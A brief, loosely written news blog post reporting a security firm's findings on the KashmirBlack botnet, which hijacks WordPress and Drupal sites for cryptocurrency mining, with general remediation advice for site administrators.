June 5, 2023

The highly-sophisticated botnet is believed to have infected hundreds of thousands of websites by attacking their underlying CMS platforms, according to US-based cyber security firm Imperva , named to be KashmirBlack. The main victims are Drupal, WordPress and its counts

The botnet’s prime purpose appears to infect websites, and then use their servers for cryptocurrency mining.

Hackers based on Indonesia has a base where Command&Control Infrastructure has been placed.

The botnet is the work of a hacker named “Exect1337“, a member of the Indonesian hacker crew PhantomGhost.

“The KashmirBlack C&C has three main roles: Supply a Perl script that infects the victim server with the botnet malicious script, receive reports of findings and attack results from bots and supply bots with attack instructions,” most of the victim site is from US

The KashmirBlack C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction with the newly- found sites, and pushes it into a queue waiting for bots to receive them and attack.

The team found more than 20 distinct exploits.

The team advised several actions that should be performed in case your server is infected by the KashmirBlack botnet.

“Kill malicious processes, remove malicious files, remove suspicious and unfamiliar jobs and remove unused plugins and themes”.

The site administrator should ensure the CMS core files and third-party modules are always up-to-date and properly configured.

“Strong and unique passwords are recommended, as they are the first defence against brute force attacks,” .

Leave a Reply

%d bloggers like this: